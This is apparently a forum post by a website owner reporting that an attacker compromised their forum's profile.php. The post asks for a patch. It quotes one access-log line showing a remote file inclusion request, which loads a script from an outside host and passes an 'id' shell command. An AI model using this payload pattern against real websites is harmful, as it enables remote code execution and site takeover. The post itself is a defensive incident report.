A security flaw has been found with Profile.php, my website was hacked with the below command.
201.29.250.108 - - [30/Apr/2007:21:43:11 -0400] "GET
[url=http://]http://[/url]<websiteURL>/forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id
HTTP/1.1" 200
1372 <websiteURL> "-" "-" "-"
My websites URL was removed to protect my site. My hopes is that someone can find the security flaw within the offending file and create a patch ASAP. The profile system and all it entails is currently OFFLINE on my website.